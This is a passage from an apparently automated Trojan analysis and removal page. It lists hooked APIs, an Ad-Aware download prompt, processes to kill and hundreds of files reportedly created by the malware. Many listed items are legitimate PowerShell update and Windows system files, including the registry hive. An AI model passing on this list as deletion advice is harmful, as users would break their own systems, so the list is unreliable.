The Trojan installs the following user-mode hooks in kernel32.dll:
ExitProcess
GetFileAttributesExW
The Trojan installs the following user-mode hooks in ntdll.dll:
NtCreateThread
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1480
mofcomp.exe:3476
WindowsXP-KB968930-x86-ENG.exe:3964
new.exe:3064
net1.exe:2460
tasklist.exe:2264
ngen.exe:3596
ngen.exe:3168
ngen.exe:3676
ngen.exe:3300
ngen.exe:856
ngen.exe:2988
ngen.exe:3172
ngen.exe:1960
ngen.exe:1944
ngen.exe:420
ngen.exe:916
ngen.exe:3936
ngen.exe:3996
ngen.exe:1868
ngen.exe:2188
ngen.exe:2952
ngen.exe:3560
ngen.exe:3224
ngen.exe:1724
ngen.exe:3220
ngen.exe:1976
ngen.exe:2164
ngen.exe:648
update.exe:4040
net.exe:2156
net.exe:2224
net.exe:2416
hostname.exe:1384
PSCustomSetupUtil.exe:620
PSCustomSetupUtil.exe:452
PSCustomSetupUtil.exe:3908
PSCustomSetupUtil.exe:1924
PSCustomSetupUtil.exe:2196
PSCustomSetupUtil.exe:3064
PSCustomSetupUtil.exe:2308
PSCustomSetupUtil.exe:2224
PSCustomSetupUtil.exe:3696
PSCustomSetupUtil.exe:3856
PSCustomSetupUtil.exe:2176
PSCustomSetupUtil.exe:2244
PSCustomSetupUtil.exe:2112
PSCustomSetupUtil.exe:2240
PSCustomSetupUtil.exe:3992
PSCustomSetupUtil.exe:2288
PSCustomSetupUtil.exe:2344
PSCustomSetupUtil.exe:3952
PSCustomSetupUtil.exe:2552
PSCustomSetupUtil.exe:1496
PSCustomSetupUtil.exe:264
PSCustomSetupUtil.exe:1868
PSCustomSetupUtil.exe:1284
PSCustomSetupUtil.exe:2332
PSCustomSetupUtil.exe:2556
PSCustomSetupUtil.exe:2140
ipconfig.exe:1240
yfenaromaf.exe:1664
PSSetupNativeUtils.exe:1932
mscorsvw.exe:4008
mscorsvw.exe:3128
mscorsvw.exe:2592
mscorsvw.exe:2732
mscorsvw.exe:3104
mscorsvw.exe:2284
mscorsvw.exe:3484
mscorsvw.exe:2168
mscorsvw.exe:2072
mscorsvw.exe:3084
mscorsvw.exe:2408
mscorsvw.exe:828
regsvr32.exe:3404
regsvr32.exe:3200
wsmanhttpconfig.exe:3232
wsmanhttpconfig.exe:1960
netsh.exe:2304
bindata865.exe:3088 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Application Data\Olifiqtu\yfenaromaf.exe (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp1.tmp (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp2.tmp (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpfa60f4ad.bat (177 bytes)
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpD4.tmp (1 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.exe (2526 bytes)
C:\ea4acb66495575d6b9f323\about_transactions.help.txt (1011 bytes)
C:\ea4acb66495575d6b9f323\about_format.ps1xml.help.txt (17 bytes)
C:\ea4acb66495575d6b9f323\wsmplpxy.dll (603 bytes)
C:\ea4acb66495575d6b9f323\windowsremoteshell.adm (12 bytes)
C:\ea4acb66495575d6b9f323\pscustomsetuputil.exe (316 bytes)
C:\ea4acb66495575d6b9f323\about_jobs.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\$shtdwn$.req (788 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe (7339 bytes)
C:\ea4acb66495575d6b9f323\update\updspapi.dll (5940 bytes)
C:\ea4acb66495575d6b9f323\about_command_syntax.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_bits_cmdlets.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\ea4acb66495575d6b9f323\importallmodules.psd1 (438 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\winrm.vbs (2727 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\ea4acb66495575d6b9f323\update\update.exe (10748 bytes)
C:\ea4acb66495575d6b9f323\about_job_details.help.txt (824 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.psd1 (950 bytes)
C:\ea4acb66495575d6b9f323\about_locations.help.txt (794 bytes)
C:\ea4acb66495575d6b9f323\about_comparison_operators.help.txt (11 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.dll (1842 bytes)
C:\ea4acb66495575d6b9f323\about_return.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\spuninst.exe (3787 bytes)
C:\ea4acb66495575d6b9f323\about_remote.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\wevtfwd.dll (3351 bytes)
C:\ea4acb66495575d6b9f323\about_wmi_cmdlets.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll-help.xml (16567 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_parameters.help.txt (962 bytes)
C:\ea4acb66495575d6b9f323\about_arrays.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\about_trap.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\about_pssession_details.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\ea4acb66495575d6b9f323\about_break.help.txt (792 bytes)
C:\ea4acb66495575d6b9f323\registry.format.ps1xml (20 bytes)
C:\ea4acb66495575d6b9f323\spmsg.dll (495 bytes)
C:\ea4acb66495575d6b9f323\filesystem.format.ps1xml (133 bytes)
C:\ea4acb66495575d6b9f323\diagnostics.format.ps1xml (590 bytes)
C:\ea4acb66495575d6b9f323\about_redirection.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\ea4acb66495575d6b9f323\about_aliases.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_operators.help.txt (770 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\ea4acb66495575d6b9f323\about_throw.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\ea4acb66495575d6b9f323\about_debuggers.help.txt (21 bytes)
C:\ea4acb66495575d6b9f323\wsmwmipl.dll (2816 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_2.0.help.txt (453 bytes)
C:\ea4acb66495575d6b9f323\wsmtxt.xsl (2 bytes)
C:\ea4acb66495575d6b9f323\winrm.cmd (35 bytes)
C:\ea4acb66495575d6b9f323\about_split.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\ea4acb66495575d6b9f323\about_history.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll (13 bytes)
C:\ea4acb66495575d6b9f323\about_regular_expressions.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\wsman.format.ps1xml (837 bytes)
C:\ea4acb66495575d6b9f323\about_properties.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\pwrshplugin.dll (802 bytes)
C:\ea4acb66495575d6b9f323\powershelltrace.format.ps1xml (344 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\ea4acb66495575d6b9f323\about_types.ps1xml.help.txt (481 bytes)
C:\ea4acb66495575d6b9f323\about_signing.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\about_do.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\winrm.ini (1956 bytes)
C:\ea4acb66495575d6b9f323\about_script_internationalization.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\ea4acb66495575d6b9f323\help.format.ps1xml (3947 bytes)
C:\$Directory (800 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_ise.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_arithmetic_operators.help.txt (168 bytes)
C:\ea4acb66495575d6b9f323\about_escape_characters.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll (14450 bytes)
C:\ea4acb66495575d6b9f323\winrshost.exe (22 bytes)
C:\ea4acb66495575d6b9f323\about_remote_output.help.txt (887 bytes)
C:\ea4acb66495575d6b9f323\about_pipelines.help.txt (411 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\ea4acb66495575d6b9f323\about_remote_jobs.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\winrsmgr.dll (2 bytes)
C:\ea4acb66495575d6b9f323\wsmprovhost.exe (657 bytes)
C:\ea4acb66495575d6b9f323\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\ea4acb66495575d6b9f323\about_assignment_operators.help.txt (379 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\ea4acb66495575d6b9f323\windowspowershellhelp.chm (26041 bytes)
C:\ea4acb66495575d6b9f323\about_functions.help.txt (586 bytes)
C:\ea4acb66495575d6b9f323\about_providers.help.txt (59 bytes)
C:\ea4acb66495575d6b9f323\wsmsvc.dll (15909 bytes)
C:\ea4acb66495575d6b9f323\about_type_operators.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_preference_variables.help.txt (37 bytes)
C:\ea4acb66495575d6b9f323\about_eventlogs.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_commonparameters.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\certificate.format.ps1xml (155 bytes)
C:\ea4acb66495575d6b9f323\about_comment_based_help.help.txt (595 bytes)
C:\ea4acb66495575d6b9f323\about_command_precedence.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\about_profiles.help.txt (457 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.format.ps1xml (16 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll (1145 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe.mui (10 bytes)
C:\ea4acb66495575d6b9f323\about_for.help.txt (146 bytes)
C:\ea4acb66495575d6b9f323\winrs.exe (1154 bytes)
C:\ea4acb66495575d6b9f323\about_prompts.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\winrssrv.dll (12 bytes)
C:\ea4acb66495575d6b9f323\about_remote_troubleshooting.help.txt (146 bytes)
C:\ea4acb66495575d6b9f323\pwrshsip.dll (24 bytes)
C:\ea4acb66495575d6b9f323\about_try_catch_finally.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll (3386 bytes)
C:\ea4acb66495575d6b9f323\about_parsing.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_automatic_variables.help.txt (14 bytes)
C:\ea4acb66495575d6b9f323\update\spcustom.dll (23 bytes)
C:\ea4acb66495575d6b9f323\about_pssnapins.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\ea4acb66495575d6b9f323\about_objects.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_quoting_rules.help.txt (659 bytes)
C:\ea4acb66495575d6b9f323\wsmres.dll (6164 bytes)
C:\ea4acb66495575d6b9f323\about_remote_requirements.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_switch.help.txt (489 bytes)
C:\ea4acb66495575d6b9f323\about_methods.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\wsmpty.xsl (1 bytes)
C:\ea4acb66495575d6b9f323\about_language_keywords.help.txt (11 bytes)
C:\ea4acb66495575d6b9f323\update\eula.txt (586 bytes)
C:\ea4acb66495575d6b9f323\about_ws-management_cmdlets.help.txt (405 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll (562 bytes)
C:\ea4acb66495575d6b9f323\default.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\getevent.types.ps1xml (15 bytes)
C:\ea4acb66495575d6b9f323\about_continue.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\about_logical_operators.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll (33 bytes)
C:\ea4acb66495575d6b9f323\profile.ps1 (772 bytes)
C:\ea4acb66495575d6b9f323\about_script_blocks.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\ea4acb66495575d6b9f323\spupdsvc.exe (287 bytes)
C:\ea4acb66495575d6b9f323\about_session_configurations.help.txt (276 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\ea4acb66495575d6b9f323\about_scripts.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\eventforwarding.adm (2 bytes)
C:\ea4acb66495575d6b9f323\about_foreach.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\about_execution_policies.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\powershellcore.format.ps1xml (1492 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.dll (591 bytes)
C:\ea4acb66495575d6b9f323\dotnettypes.format.ps1xml (266 bytes)
C:\ea4acb66495575d6b9f323\about_join.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_ref.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\winrscmd.dll (2907 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\ea4acb66495575d6b9f323\about_special_characters.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\types.ps1xml (2510 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\ea4acb66495575d6b9f323\about_while.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\windowsremotemanagement.adm (574 bytes)
C:\ea4acb66495575d6b9f323\about_hash_tables.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_wildcards.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\about_reserved_words.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe (3009 bytes)
C:\ea4acb66495575d6b9f323\update\update.inf (2457 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.resources.dll (3153 bytes)
C:\ea4acb66495575d6b9f323\pssetupnativeutils.exe (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll (9 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.resources.dll (4 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_methods.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\wtrinstaller.ico (4803 bytes)
C:\ea4acb66495575d6b9f323\about_environment_variables.help.txt (417 bytes)
C:\ea4acb66495575d6b9f323\update\kb968930xp.cat (512 bytes)
C:\ea4acb66495575d6b9f323\about_remote_faq.help.txt (775 bytes)
C:\ea4acb66495575d6b9f323\about_variables.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\update\update.ver (14 bytes)
C:\ea4acb66495575d6b9f323\about_data_sections.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.mof (789 bytes)
C:\ea4acb66495575d6b9f323\about_requires.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.mof (4 bytes)
C:\ea4acb66495575d6b9f323\about_line_editing.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\about_core_commands.help.txt (221 bytes)
C:\ea4acb66495575d6b9f323\about_path_syntax.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_scopes.help.txt (76 bytes)
C:\ea4acb66495575d6b9f323\pspluginwkr.dll (1756 bytes)
C:\ea4acb66495575d6b9f323\about_modules.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\about_if.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\about_pssessions.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\pwrshmsg.dll (4 bytes)
C:\ea4acb66495575d6b9f323\about_parameters.help.txt (9 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)
%System%\GroupPolicy\Adm\SET3B.tmp (2 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (20 bytes)
%System%\SET12.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (4 bytes)
%System%\SET1B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (10 bytes)
%WinDir%\inf\SET1D.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (3 bytes)
%System%\SET1A.tmp (789 bytes)
%WinDir%\Help\SETCA.tmp (12287 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC5.tmp (950 bytes)
%WinDir%\SECD5.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (18248 bytes)
%System%\winrm\0409\SET22.tmp (601 bytes)
%System%\SET36.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (6 bytes)
%System%\SET25.tmp (2 bytes)
%System%\SET13.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (17 bytes)
%System%\SET14.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (10177 bytes)
%WinDir%\inf\SET1E.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETC1.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (2 bytes)
%System%\SET2A.tmp (1281 bytes)
%System%\SETC4.tmp (42 bytes)
%System%\SET19.tmp (25 bytes)
%WinDir%\ntdtcsetup.log (22691 bytes)
%WinDir%\inf\oem10.PNF (10040 bytes)
%System%\SET2D.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (13 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (27 bytes)
%System%\SET33.tmp (25 bytes)
%WinDir%\msmqinst.log (5398 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (24 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (15 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (3 bytes)
%System%\SETB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (438 bytes)
%System%\SET2B.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (1 bytes)
%System%\GroupPolicy\Adm\SET39.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (3361 bytes)
%System%\SET2E.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (17 bytes)
%System%\SETE.tmp (673 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (49 bytes)
%System%\wbem\SET23.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\SET17.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (7971 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (5 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (21 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5705 bytes)
%System%\SET34.tmp (789 bytes)
%System%\SET18.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (2 bytes)
%System%\SET27.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (1 bytes)
%System%\SET11.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (1425 bytes)
%System%\GroupPolicy\Adm\SET3A.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (11 bytes)
%System%\SET35.tmp (14 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (16 bytes)
%System%\SET10.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC8.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (40 bytes)
%System%\SET26.tmp (35 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (8 bytes)
%System%\config\system (3251 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (57 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (2321 bytes)
%System%\SET32.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (4 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC9.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (8 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\wbem\SET9.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (7 bytes)
%System%\SET16.tmp (12 bytes)
%System%\winrm\0409\SET3C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (1425 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (12 bytes)
%WinDir%\iis6.log (139812 bytes)
%WinDir%\comsetup.log (49682 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (19 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (61 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (10 bytes)
%System%\SET28.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (5 bytes)
%System%\SET31.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (23 bytes)
%System%\GroupPolicy\Adm\SET21.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC7.tmp (601 bytes)
%System%\SET29.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (40 bytes)
%System%\SET2C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (4 bytes)
%WinDir%\KB968930.log (245066 bytes)
%System%\SET15.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC3.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (13 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\SET24.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (10 bytes)
%System%\SET1C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (12 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (5 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (11 bytes)
%System%\SETD.tmp (1281 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\SETC.tmp (35 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (601 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (9 bytes)
%WinDir%\inf\SET37.tmp (38 bytes)
